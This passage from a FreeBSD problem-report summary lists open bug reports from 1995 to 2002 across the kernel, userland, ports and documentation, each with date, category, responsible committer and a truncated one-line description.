interrupted downl o [2002/01/02] kern/33464 dillon soft update inconsistencies after system o [2002/01/03] bin/33515 amd incorrectly handles multi-homed nfs s o [2002/01/03] ports/33519 portmgr make index fails if PERL_VERSION is 5.6.1 o [2002/01/04] kern/33532 sound Playing audio on some soundcards with pcm o [2002/01/04] kern/33535 invalid kernel diagnostic while writing d f [2002/01/04] gnu/33551 cvs chokes on OpenBSD repositories f [2002/01/05] kern/33578 FreeBSD panics when accessing encrypted D o [2002/01/07] ports/33650 kde py-numeric, koffice, others are hard code o [2002/01/07] kern/33653 DSL PPPoE connection error on 4.5-PRERELE o [2002/01/07] misc/33672 sheldonh telnetd and mount_mfs signal handlers cal o [2002/01/08] kern/33712 joe Duplicate make_dev panic in ugen.c + patc p [2002/01/09] misc/33723 select(2) implementation in threaded (-lc o [2002/01/09] kern/33738 argv == NULL is not handled correctly by o [2002/01/13] kern/33833 Correct kernel config for 4.4-RELEASE is o [2002/01/13] kern/33839 joe usb0: host controller halted (involving A o [2002/01/13] ports/33848 ports CUPS doesn't find parallel port o [2002/01/14] bin/33881 adduser additions: selectable crypt schem o [2002/01/15] ports/33927 ports ja-dvipdfm port requires texmf/dvips/base o [2002/01/15] ports/33929 doc Section 15.15 of the FreeBSD Porter's Han o [2002/01/15] ports/33931 mbr trouble installing StarOffice 5.2 over li o [2002/01/16] kern/33940 quotactl allows compromise gid-quotas o [2002/01/16] kern/33974 Can not record anything with emu10k1 on 4 f [2002/01/17] kern/33978 can't kill process o [2002/01/17] i386/33986 sound SMP and audio causes hard lockups (random o [2002/01/17] kern/34017 The siginfo_t passed to the signal handli o [2002/01/18] kern/34020 programs fail that poll(2) on fifos o [2002/01/18] bin/34030 miibus.ko can be loaded into the kernel w o [2002/01/18] kern/34031 hang with linux emulation in 4.5-RC o [2002/01/18] i386/34033 Suspend doesn't work on Dell Latitude CPx o [2002/01/18] ports/34056 ports vmware2 complains of missing file o [2002/01/19] bin/34072 semenu corrupted transfers on mounted ntfs parti f [2002/01/19] misc/34073 3com 3c980c runs "bursty" / freezes-unfre o [2002/01/20] i386/34092 reboot hangs the system (IBM PC Server 31 o [2002/01/21] gnu/34128 sdiff "e" doesn't work with some editors o [2002/01/21] ports/34153 andreas The apsfilter configure script adds bzip2 o [2002/01/23] kern/34205 joe detect USB memory device, But can not use o [2002/01/23] ports/34212 cpiazza Segmentation fault in audio/gmixer o [2002/01/24] kern/34228 Dual processor machine hangs at reboot o [2002/01/24] gnu/34246 joe CVS doesn't rebuild CVSROOT/options o [2002/01/25] kern/34266 SMP does not work on CPQ0579 System board o [2002/01/25] i386/34267 semenu FreeBSD hangs and reboots when overloaded o [2002/01/25] bin/34269 tcpdump -v incorectly identifies packets o [2002/01/25] misc/34270 man -k could be used to execute any comma f [2002/01/26] kern/34306 gibbs 4.5-RC panics on boot with half-supported o [2002/01/29] ports/34409 kuriyama prc-tools from ports fails to compile on f [2002/01/29] i386/34422 crash system wnen kill pppd with reattach o [2002/01/30] misc/34458 green 4.5S/sshd forwarding problems o [2002/01/30] ports/34467 portmgr bsd.port.mk is broken WRT USE_AUTOCONF_VE o [2002/01/31] ports/34480 jmz system hangs after killing xinit o [2002/02/01] i386/34536 accept() blocks other threads o [2002/02/01] bin/34539 [PATCH] fsck(8) doesn't account for negat o [2002/02/01] kern/34544 Kernel crash on fclose() of /dev/kbd1 whe o [2002/02/02] ports/34558 sobomax wxgtk-devel port broken o [2002/02/02] misc/34568 turning printer on and off hangs the comp o [2002/02/03] kern/34582 wpaul Support for D-Link DFE-690TXD Cardbus PC o [2002/02/03] bin/34586 sos burncd -t blank blanks CD o [2002/02/03] i386/34588 read-prefetch on VIA 686B IDE causes hang a [2002/02/03] bin/34601 sheldonh bc(1)'s multi-line file parsing problem o [2002/02/04] kern/34619 TCP - FINs with different sequence number o [2002/02/06] kern/34672 imp NEWCARD panic. p [2002/02/06] bin/34682 fenner scanf/sscanf doesn't understand %lld a [2002/02/07] ports/34691 ports new port for sfs - the self-certifying fi f [2002/02/07] bin/34725 sos burncd cannot write audio file as the 1st o [2002/02/07] bin/34727 ``/bin/mkdir -p /'' fails o [2002/02/08] ports/34730 ports new port qmail-scanner - a virus-scanning o [2002/02/09] kern/34764 cisco aironet driver freezes with toshiba o [2002/02/09] kern/34765 darrenr Unloading the ipl.ko module will panic th o [2002/02/10] kern/34801 darrenr TCP window size bug (afflicting IP Filter o [2002/02/10] bin/34811 sh: "jobs" is not pipeable o [2002/02/11] misc/34842 VmWare port + NIS causes "broadcast storm o [2002/02/12] ports/34893 deischen RUS-CERT Advisory 2002-02:01: Temporary f o [2002/02/12] kern/34895 Linuxulator linux_fcntl64() doesn't handl o [2002/02/13] i386/34902 FTP session causes server reboot o [2002/02/13] ports/34907 sf 4.5/ports/ftp/wget+ipv6 hangs top make o [2002/02/15] ports/34990 kde Kde coredump on halt o [2002/02/16] kern/35004 [PATCH] Fix for pcm driver lockups o [2002/02/17] kern/35061 After printing to HP Deskjet 656c USB pri o [2002/02/18] kern/35081 zebra routing problem - kernel bug??? p [2002/02/18] bin/35087 TAR does not recurse directories if it ru o [2002/02/18] misc/35104 Files end up being no bigger than 8192 by o [2002/02/19] misc/35116 keyinfo reports root's keyinfo o [2002/02/20] kern/35136 VLAN & bridging & MTU o [2002/02/20] misc/35145 cannot open /etc/termcap and no terminal o [2002/02/21] ports/35179 kris elm-2.5.5_1: bounce command doesn't work o [2002/02/21] ports/35183 portmgr postgresql-7.1 repo copy request o [2002/02/22] ports/35209 nakai icewm 1.0.9 crashes o [2002/02/22] bin/35214 obrien dump program hangs while exiting o [2002/02/23] ports/35237 ports empty manpage installed by trafcount port o [2002/02/23] kern/35248 panic: ffs_valloc: dup alloc o [2002/02/23] misc/35267 after cvsup src-all for 4.5, /stand/sysin o [2002/02/25] bin/35307 standard include files are not standard c o [2002/02/25] bin/35309 umount -f does not work for ufs floppy o [2002/02/25] misc/35310 SSHing with expired password does not bri o [2002/02/25] ports/35320 znerd linux-jdk-1.4 JVM fails when running Tomc o [2002/02/25] bin/35329 Linking against libc_r.* provokes nasty l o [2002/02/26] misc/35350 Can't boot on ASUS TXP4 o [2002/02/26] kern/35351 emu10k1: no posibility to record sound. K o [2002/02/26] ports/35353 green cfs strips eighth bit of file name on "ou o [2002/02/26] ports/35364 ports cdb port forgets uint32.h f [2002/02/27] ports/35386 ports doxygen port will not configure o [2002/02/27] kern/35396 poll(2) doesn't set POLLERR for failed co o [2002/02/28] kern/35399 poll(2) botches revents on dropped socket o [2002/02/28] kern/35425 System hang while boot on specific SMP mo o [2002/02/28] kern/35429 select(2)/poll(2)/kevent(2) can't/don't n o [2002/02/28] kern/35442 Problem transmitting runts in if_sis driv o [2002/03/01] alpha/35455 alpha Unable to compile ISA NIC devices into ke o [2002/03/01] kern/35461 trap 12 when booting with Maxtor 160G dis o [2002/03/02] kern/35482 dc driver uses wrong case to read MAC fro o [2002/03/03] misc/35506 innetgr() doesn't match wildcard fields i o [2002/03/03] kern/35511 sis(4) multicast filtering doesn't pass s o [2002/03/03] ports/35515 steve open-motif-2.1.30_2 installation deletes o [2002/03/03] ports/35517 portmgr New port: MySQL 4.0 o [2002/03/04] bin/35538 ssh can hang waiting for EOF on stdin f [2002/03/05] ports/35570 ports aureal-kmod ports has invalid Makefile o [2002/03/05] ports/35579 ports New port: phpsysinfo o [2002/03/06] docs/35620 doc make release fails in documentation for R o [2002/03/07] bin/35622 sigaltstack is missing in libc_r o [2002/03/07] ports/35631 ports SKIP and IPSEC together cause kernel pani o [2002/03/07] kern/35645 Layer 2 switching using default router of o [2002/03/07] misc/35662 send-pr and/or web pr query system screws o [2002/03/08] kern/35669 NFSROOT breaks without a gateway o [2002/03/08] docs/35678 doc docproj Makefiles for web are broken for o [2002/03/08] kern/35691 Realtek NIC driver does not work with Rea o [2002/03/09] kern/35703 /proc/curproc/file returns unknown o [2002/03/09] docs/35724 doc www; Handbook missing link to important H o [2002/03/10] i386/35742 USB 2.0 attached device cannot be fdisk'd o [2002/03/10] kern/35756 USB reattach of Sony DSC-S75 fails, USB s o [2002/03/11] misc/35774 [SECURITY] Suboptimal auditing possibilit o [2002/03/11] ports/35777 des www/linux-opera does not install with lin f [2002/03/11] ports/35780 ports Update port: russian/fortuneru o [2002/03/12] alpha/35815 alpha Can't install 4.5 for Alpha from the 4.5- o [2002/03/12] bin/35842 rm -f nonexistent file successful but rm o [2002/03/13] bin/35843 maxim [PATCH] MD5 auth implemented in routed is o [2002/03/13] kern/35873 recent -STABLE dhclient doesn't see wirel o [2002/03/13] gnu/35878 /usr/bin/strip resets ABI type to FreeBSD o [2002/03/13] conf/35880 rc files could be a bit more jail friendl o [2002/03/14] kern/35887 ipfw(8) limit feature does not work prope o [2002/03/15] bin/35921 Wrong path reduction of dot-dot paths in o [2002/03/15] misc/35924 signal.h does not check for _POSIX_REALTI o [2002/03/15] bin/35925 fixit floppy cannot be mounted on USB dri a [2002/03/15] docs/35940 keramida red(1) manual doesn't explain red(1). a [2002/03/16] kern/35985 re swap double mount o [2002/03/16] kern/35986 Wrong bpf-header preceading packet when u o [2002/03/16] kern/35989 720KB floppies unusable o [2002/03/17] kern/36002 compile is stopped without DDB define o [2002/03/17] i386/36003 Cyclades Cyclom YeP causes panics on Free o [2002/03/17] kern/36038 bp sendfile(2) on smbfs fails, exposes kerne f [2002/03/18] kern/36056 atapicd driver won't boot with cdr-cdroms o [2002/03/18] kern/36057 atacontrol, apm, kernel panic o [2002/03/18] ports/36071 portmgr devel/autoconf213: eliminate file conflic o [2002/03/18] ports/36077 portmgr devel/automake14: fix info file overlap w o [2002/03/19] misc/36086 Kerberos Problem/Handbook wrong/Followup o [2002/03/19] ports/36123 portmgr seemingly bogus run-time dependency on mk f [2002/03/20] ports/36144 ports New port: pinepgp-0.17.3 o [2002/03/20] kern/36147 bogus irq 7 message being issued o [2002/03/21] kern/36160 Kernel halts while trying to detect CD-C6 o [2002/03/21] bin/36167 _THREAD_SAFE & _REENTRANT used inconsiste o [2002/03/21] docs/36168 doc -pthread/_THREAD_SAFE docs missing in gcc o [2002/03/21] bin/36175 billf Vsnprintf causes memeory leak o [2002/03/22] kern/36204 cannot install -STABLE from CD-ROM Drive o [2002/03/22] kern/36209 read() system call never returns in some o [2002/03/22] kern/36219 poll() behaves erratic on BPF file descri o [2002/03/22] kern/36220 panic: sched_sync: fsync failded vp 0xcf4 o [2002/03/23] ports/36237 portmgr registering _real_ dependencies in bsd.po o [2002/03/25] kern/36300 acd0c: 'device not configured ' after sta o [2002/03/25] ports/36303 dirk Apache with mod_php4 wont run if mod_php4 o [2002/03/25] kern/36315 panic: vm_fault on nofault entry while ru o [2002/03/26] kern/36329 reference of unexistent object f [2002/03/26] ports/36363 ports apache13-ssl - default'httpsd.conf' lack o [2002/03/27] ports/36393 nakai [Update] x11-wm/qvwm to 1.1.12 o [2002/03/27] ports/36411 glewis java/jdk13 not owner/group safe o [2002/03/28] kern/36413 the bktr driver tries to destroy device a o [2002/03/28] kern/36415 the bktr driver incorrectly handles the s o [2002/03/28] ports/36434 jmz Unable to build XFree86-4 a [2002/03/28] i386/36451 roger (sys/dev/bktr) Japan IF frequency is inco f [2002/03/29] ports/36472 kde Unable to build KDE2 - Konq problem s [2002/03/29] bin/36473 ru Overdue MFC's in chmod/chown/chflags o [2002/03/29] kern/36482 Multiport starfire card (sf/ukphy) doesn' o [2002/03/29] ports/36484 sobomax Windowmaker 0.80.0 should be marked with o [2002/03/29] conf/36508 installation floppy bug (See description) s [2002/03/29] ports/36516 dwcjr MAINTAINER UPDATE: delete print/texinfo, o [2002/03/29] i386/36517 sis driver can't map ports/memory for Net o [2002/03/29] kern/36522 stat outside procs in procfs succeeds fro o [2002/03/29] ports/36526 nakai xfce help file images not shown o [2002/03/30] ports/36554 netchild ports/lang/icc requires linux_devtools to o [2002/03/31] ports/36565 ports x11/XFree86-4-libraries doesn't install e o [2002/03/31] kern/36566 System reboot with dead smb mount and umo o [2002/03/31] kern/36603 X crashes o [2002/03/31] kern/36605 [PATCH] vm_zone: zinitna failure leaves z o [2002/04/01] kern/36610 acd0: MODE_SENSE_BIG command timeout - re o [2002/04/01] docs/36642 doc 4.5 man page on ipfw new option limit is o [2002/04/01] i386/36647 There is no suitable driver for SURECOM E o [2002/04/03] kern/36708 panic: ufs_dirbad: bad dir during pkg_inf o [2002/04/03] ports/36711 ports Configure Bug: cyrus-sasl-1.5.27_2 / krb o [2002/04/03] i386/36718 install boot before sysinstall halts ata1 o [2002/04/04] i386/36761 Symbol problems dependant on boot method, s [2002/04/04] ports/36772 ports smtpd incompatible with newest sendmail o [2002/04/05] kern/36784 Can't fcntl(fd, F_SETFL, ...) on a pseudo o [2002/04/05] kern/36790 kernel panic in biodone() on boot p [2002/04/05] ports/36804 ports portupgrade of apache13+modssl causes cer o [2002/04/06] ports/36811 ports XFree86-4-libraries cannot find version.d o [2002/04/06] kern/36813 arr un-bzero'd sin_zero causes bind() in PF_I o [2002/04/06] ports/36819 ports /usr/ports/x11/XFree86-4 compilation trou s [2002/04/06] ports/36826 alane x11-servers/XFree86-4-Server: xf86cfg -te o [2002/04/07] ports/36838 scrappy MICO update to 2.3.7 o [2002/04/07] ports/36843 nik auth_ldap port fix f [2002/04/07] docs/36844 doc Wrong link to top logo on Russian WWW (da o [2002/04/07] ports/36846 ports fxtv 1.03 freezes the system when $LANG=d o [2002/04/07] kern/36858 The USB flash drive "Apacer HandyDrive" c o [2002/04/07] bin/36867 games/fortune: add FORTUNE_PATH env var, o [2002/04/08] kern/36876 sos Weird read-errors while accessing data fr o [2002/04/08] ports/36879 ports emulators/vmware2 freezes and reboots sys o [2002/04/08] conf/36911 installation floppies miss autoload file o [2002/04/09] bin/36926 send-pr destroys PR if emacs interrupt ch f [2002/04/09] ports/36934 olgeni nessus port only builds on 4.5 or -curren o [2002/04/09] i386/36943 reboot hangs on Tyan Thunder K7 with SMP o [2002/04/09] kern/36953 des linux emulation does not work well on SMP f [2002/04/09] ports/36954 ports PostgreSQL daylight savings fix... o [2002/04/11] i386/36991 Installing gnome from packages over the n o [2002/04/11] misc/36999 2 Default Routes Created f [2002/04/11] ports/37005 vanilla Broken build of /usr/ports/graphics/gimp1 o [2002/04/11] ports/37006 dirk cdrecord does not work with Teac USB CDRW o [2002/04/12] bin/37026 FBSD4.5/4.4 sshd coredump, for unexisting o [2002/04/12] docs/37029 doc The translation in Italian language of th o [2002/04/13] kern/37035 [PATCH] msdosfs_readdir() freezes after f o [2002/04/13] kern/37043 Latest stable causes SCSI bus freeze on s o [2002/04/14] kern/37057 Problem with rlimits on filesystem mounte o [2002/04/14] ports/37085 andreas apsfilter/ghostscript don't work with hpi o [2002/04/15] kern/37109 Kernel refuses to assign unused IP to tun f [2002/04/16] ports/37142 dirk [Patch] devel/pth (use libtool and load s o [2002/04/16] bin/37159 ru more then one natd use running use the sa o [2002/04/16] ports/37165 dirk port print/lyx does not build on 4-STABLE o [2002/04/16] kern/37171 smbfs non-functional in -STABLE o [2002/04/17] ports/37180 dirk [New Port] php-dev (apache 1.3 / 2.0 modu o [2002/04/18] ports/37223 sobomax devel/sdl12 1.2.4 broken (includes patch o [2002/04/18] bin/37224 make: $< only set for implicit rules o [2002/04/18] ports/37236 obrien bash1 port broken? o [2002/04/18] i386/37240 EtherExpress16 not probed at boot o [2002/04/19] i386/37243 dvd rom - ata0-slave: identify retries ex o [2002/04/19] ports/37251 portmgr ports seem to have to hardwire numeric us o [2002/04/19] kern/37261 luigi kernel is not linking without "device eth o [2002/04/19] ports/37262 ports gphoto2 fails to find supported USB digit o [2002/04/19] kern/37270 jeff nullfs broken by locking changes in -curr o [2002/04/20] alpha/37295 alpha Make Install of KDE2 fails on alpha o [2002/04/20] ports/37297 ports Problem with DPMS* functions in avifile b o [2002/04/21] ports/37309 jmz XFree86-4 port (XFree86 4.2) doesn't comp o [2002/04/21] kern/37311 latent bug: kernel crash in -stable, same f [2002/04/21] ports/37319 ports [Patch] textproc/pspell-ispell (Makefile o [2002/04/21] kern/37326 smbus/bktr crash when omitting "device ii o [2002/04/21] kern/37332 scsi PATCH: add pen device to scsi_da.c o [2002/04/22] bin/37343 portmap TCP binds strangeness o [2002/04/22] ports/37358 ports xawtv generates sigalrm with bktr o [2002/04/22] ports/37361 sobomax installing gcc30 port breaks devel/gettex o [2002/04/23] alpha/37382 alpha de0 (tulip) DEC-21140A card stays in OACT o [2002/04/23] alpha/37385 alpha xl0 network card (509B) fails on heavy tr o [2002/04/23] misc/37399 rsh does not work from Win 2k to freeBSD o [2002/04/23] ports/37400 nakai The cosmo game contains unchecked buffers o [2002/04/24] i386/37420 Copying large files from an IDE CD-ROM to o [2002/04/24] kern/37436 accept dead loop when out of file descrip o [2002/04/24] kern/37441 ISA PNP parse problem o [2002/04/24] kern/37443 incorrect move pointer in environment str o [2002/04/25] bin/37468 ports mpeg_play compiled on current/DP1 does no o [2002/04/26] i386/37482 Weird behaviour under relatively slow loa o [2002/04/26] bin/37495 /stand/sysinstall coredumps during packag o [2002/04/27] kern/37502 NFS client ignores mtime.tv_usec for open o [2002/04/28] i386/37523 lock for bios16 call and vm86call o [2002/04/28] ports/37537 ports trafcount causes reboot at 3AM every nigh f [2002/04/28] ports/37540 kde kde3 building problem o [2002/04/29] kern/37573 kernel crashes when changing dummynet pip o [2002/04/29] misc/37585 System hangs on install at probing device o [2002/04/30] misc/37586 newfs failing in 5.0-DP1 initial install o [2002/04/30] kern/37589 Kernel panics upon resume from zzz on my o [2002/04/30] ports/37612 ports [New Port] PHP Development version o [2002/05/14] kern/38095 vlan not supported with fxp o [2002/05/15] ports/38110 ports NEW PORT: games/wmpuzzle for WindowMaker/ o [2002/05/16] kern/38139 no carrier after kernel rebuild o [2002/05/16] i386/38151 Installation of 5.0DP1 panics very early o [2002/05/16] kern/38166 ipv6_gateway_enable="YES" breaks lpd o [2002/05/17] kern/38170 fpgetmask, fpsetmask yield strange result o [2002/05/17] ports/38172 keith ports/chinese/ghostscript6 o [2002/05/17] ports/38182 dirk php 4.2.1 port fails during make o [2002/05/17] kern/38210 SIOCGIFCONF truncates interface list. o [2002/05/17] ports/38212 knu XFree86-4 and portupgrade get dependencie a [2002/05/18] bin/38236 mp gdb do not work with gcc-3.1 o [2002/05/18] misc/38241 mount_cd9660 doesn't mount/read multisess o [2002/05/20] kern/38333 ATA drives only UDMA33 after APM standby o [2002/05/21] misc/38373 ipfw-graph reboots compaq 5500r o [2002/05/21] bin/38374 [patch] crontab environment variable pars o [2002/05/21] ports/38375 dirk The port lang./php4 can't be used as CGI o [2002/05/22] kern/38438 System crashes when starting XFree4 o [2002/05/23] misc/38460 ports core dumps with ghostscript o [2002/05/24] kern/38495 soreceive fails to maintain invariant on o [2002/05/24] kern/38527 /dev/random does not obey O_NONBLOCK flag o [2002/05/25] kern/38549 the procces compiled whith pthread stoppe o [2002/05/25] kern/38554 changing interface ipaddress doesn't seem o [2002/05/25] ports/38560 cpiazza PATCH: audio/gmixer uses uninitialized po o [2002/05/25] kern/38562 bridge_cfg=*dc0* ; kldload if_dc => panic o [2002/05/26] misc/38582 qa sysinstall sets newfs flag after changing o [2002/05/26] ports/38587 kuriyama bug in snmpd v5.0.1 in freebsd systems o [2002/05/26] ports/38590 ports XFree86 4.2 driver module cirrus_alpine.o o [2002/05/27] ports/38602 gpalmer x11-wm/tvtwm is confused about PREFIX o [2002/05/27] docs/38608 doc DOS install directory must be X:\FreeBSD o [2002/05/27] bin/38609 qa Sysinstall should know the size of the va o [2002/05/27] misc/38629 X window size too big for screen, how do o [2002/05/27] kern/38632 Loss of connection with wi cards o [2002/05/28] ports/38670 gnome gnome2 metaport crashes while installing o [2002/05/29] ports/38681 nectar pam_krb5-1.0.3 configure fails to determi p [2002/05/29] i386/38703 iedowse disklabel initializes fragment size to be o [2002/05/30] i386/38731 Freebsd doesn't support ( pdc20276 / Raid o [2002/05/30] kern/38736 kernel panic during memory stick removal o [2002/05/30] ports/38744 ports net/openldap2 doesn't work if db3 and db4 o [2002/05/30] kern/38752 rn_walktree_from not halting at the right o [2002/05/31] kern/38763 GENERIC kernel doesn't boot o [2002/05/31] kern/38764 Maxtor 30GB USB-2.0 drive needs quirk ent o [2002/05/31] bin/38765 CVS Daemon Vulnerability in 1.11.1p1 o [2002/05/31] ports/38770 obrien gcc 3.0.4 fails to build o [2002/05/31] bin/38778 dhclient infinite loop on ro /etc/resolv. o [2002/06/01] kern/38794 ESS Solo driver truncates output o [2002/06/01] kern/38795 kldunload of snd_ess, snd_sb16, snd_sb8 p o [2002/06/01] ports/38801 ports sasl_apop_patch.gz breaks LOGIN mech (SMT o [2002/06/02] ports/38807 ports devel/subversion doesn't warn people abou o [2002/06/02] misc/38835 sysinstall always installs crypto o [2002/06/03] ports/38859 portmgr lang/gnat-doc-info: fix install o [2002/06/03] kern/38864 -CURRENT: buildkernel stop in vnode_if.h o [2002/06/04] kern/38883 'kldload bktr' stuck in state swwrt, exer o [2002/06/04] misc/38884 bug in vfprinf.c function cvt(...) o [2002/06/04] kern/38894 Dell PowerEdge 4600 PCI Bus scan problems o [2002/06/04] kern/38906 calcru: negative time of o [2002/06/05] bin/38918 edquota breaks silently when quota-marked o [2002/06/05] ports/38933 portmgr New Port: games/lbreakout2 o [2002/06/06] bin/38963 Unable to newfs vinum volumes o [2002/06/07] ports/38973 ports Error code 1 building cyrus-sasl-1.5.27_3 o [2002/06/07] kern/38983 Kernel fails to access disk o [2002/06/07] misc/38987 FTP anonymous user can create directories o [2002/06/07] kern/38988 New Netgear GA302-T has different PCI ID a [2002/06/07] ports/39010 ports libwmf fails to portinstall o [2002/06/08] ports/39045 tobez update math/p5-Math-BigInt from 1.49 to 1 o [2002/06/10] ports/39091 ports mv *-config to libdir to coexist with apr o [2002/06/10] misc/39104 The disc in your drive looks more like an o [2002/06/10] ports/39107 portmgr _REENTRANT not defined in PTHREAD_CFLAGS o [2002/06/10] kern/39109 m_cat() does not update m_pkthdr.len o [2002/06/11] kern/39141 silby Broken PTMUD o [2002/06/11] ports/39148 ports screen consumes 100% when run o [2002/06/11] ports/39149 ports ports/mail/cyrus-imapd: cyradm causes per o [2002/06/11] ports/39151 dima acroread4 install fails o [2002/06/11] ports/39180 ports The ports file htmldoc-1.8.19-source.tar. o [2002/06/11] kern/39185 core dump binary in single user mode o [2002/06/12] conf/39196 src-crypto collection should be splitted o [2002/06/12] kern/39199 CASIO QV-4000 not recognized by /sys/dev/ o [2002/06/12] ports/39205 ports Patch to add nmh package files so EXMH re o [2002/06/13] kern/39233 NonConforming IPsec implementation from F o [2002/06/13] kern/39235 not writing correct data to TI1420 PCCARD o [2002/06/13] kern/39252 Syscons doesn't support 8-bit control cha o [2002/06/13] ports/39254 ports Insecure mode on scripts in the icradius o [2002/06/13] kern/39260 pcm0 locks on boot, Compaq Presario 1920 o [2002/06/14] bin/39296 sos burncd fails in dao mode o [2002/06/15] kern/39322 sos Strange detection of IDE CDROM o [2002/06/15] kern/39329 '..' at mountpoint is subject to the perm o [2002/06/15] kern/39331 namei cache unreliable for __getcwd() o [2002/06/15] ports/39332 ports coldsync build broken on current p [2002/06/15] misc/39350 gshapiro /var/spool/clientmqueue/ not created duri p [2002/06/15] conf/39351 dougb /etc/rc.syscons is always ran - even if t f [2002/06/15] misc/39354 where is the Brazilian portuguese locale? o [2002/06/16] kern/39369 "pseudo-device sppp" requires net/slcompr o [2002/06/16] ports/39378 ports XFree86-4-libraries fails to install with o [2002/06/16] kern/39388 ncr/sym drivers fail with 53c810 and more a [2002/06/16] kern/39396 cjc firewall security loophole o [2002/06/17] standards/39408ache FreeBSD use wrong collate table for pl_PL o [2002/06/17] ports/39441 ports x11-wm/afterstep &afterstep-i18n install/ o [2002/06/17] kern/39447 4.5R &4.6R Kernels fail to boot w/ AHA294 o [2002/06/17] kern/39449 wierd ata status o [2002/06/18] bin/39478 des `ssh-keygen -p -t rsa' causes segfault o [2002/06/18] ports/39479 ports Binary version of screen-3.9.11_1 in port f [2002/06/19] kern/39499 sos sysinstall panic with ATAPI CD-ROM o [2002/06/19] kern/39502 can't write on smbfs with scp o [2002/06/19] i386/39507 FreeBSD can't boot: BTX halted problem o [2002/06/19] i386/39536 FreeBSD default bootloader does not load o [2002/06/19] kern/39556 [PATCH] lio_listio(2) is broken. o [2002/06/20] ports/39596 gnome Gnome2's build of gtk results in broken i o [2002/06/20] i386/39604 Install failure on HP Pavilion 310n - Una o [2002/06/21] ports/39623 ports [New Ports] Development versions of PHP, o [2002/06/21] i386/39633 Errors reported in schistory.c in syscons o [2002/06/21] ports/39636 ache www/apache13 install fails w/ "xargs: unt o [2002/06/21] ports/39646 portmgr [PATCH] to fix broken _MLINKS o [2002/06/22] ports/39659 portmgr add (DOCS|EXAMPLES|DATA)DIR to PLIST_SUB o [2002/06/22] ports/39660 portmgr add ${PKGNAMEPREFIX} to (DOCS|EXAMPLES)DI o [2002/06/22] ports/39661 sobomax freetype2 fails trying to apply patch pat o [2002/06/22] ports/39662 portmgr add default MAN3PREFIX for perl ports o [2002/06/22] bin/39671 mknetid segfaults on default /etc/master o [2002/06/22] bin/39674 the new rpcbind lacks the -h IPAddrs feat o [2002/06/23] ports/39687 nbm www/zope: should use www/cgi-bin (the sym o [2002/06/23] ports/39689 obrien mail/mutt patch-1.4.rr.compressed.1.gz mi o [2002/06/23] bin/39741 dwmalone usr.sbin/pw/pw_user.c:726: warning: int f o [2002/06/23] ports/39760 jedgar ports/math/rcalc is too old and contains o [2002/06/24] conf/39763 Can't get a correct MAC address for MELCO o [2002/06/24] misc/39765 bsd.incs.mk, INCDIR or INCSDIR ? o [2002/06/24] docs/39770 doc manual page fix: `pw useradd' could be us o [2002/06/24] ports/39775 ports p5-GD has erroneous dependency on X11 and o [2002/06/24] ports/39783 ports ksh93 build fails o [2002/06/24] ports/39784 ports NEW PORT: games/marbles, a challenging pu o [2002/06/24] ports/39788 ports building proftpd in ports ignores WITH_MY 997 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1995/01/11] i386/105 Distributed libm (msun) has non-standard s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def f [1996/10/20] bin/1849 gdb sets library breakpoints on the wrong s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 tegge vm statistics are bad s [1996/12/14] bin/2216 [PATCH] Ada specs not being compiled into o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d s [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV s [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/04/14] bin/3284 mikeh [PATCH] symorder(1): -t option doesn╢t wo p [1997/05/08] gnu/3552 the -L option of tar does not work proper f [1997/05/16] bin/3608 jkoshy Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) f [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 jlemon nonworking t/tcp server side o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/26] bin/4172 des suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 portmgr Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 qa Can't fixit with an NFS-mounted CD. o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/11/13] bin/5031 gad lpr does not remove original file if -s i s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with o [1998/01/11] bin/5483 Login(1) clears utmp entry s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 jkoshy Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 gad lpd cannot send long files to HP's JetDir o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 mikeh /bin/chio code cleaup and option added o [1998/02/14] bin/5745 nik [PATCH] Add /usr/local/share/mk to defaul o [1998/02/26] kern/5863 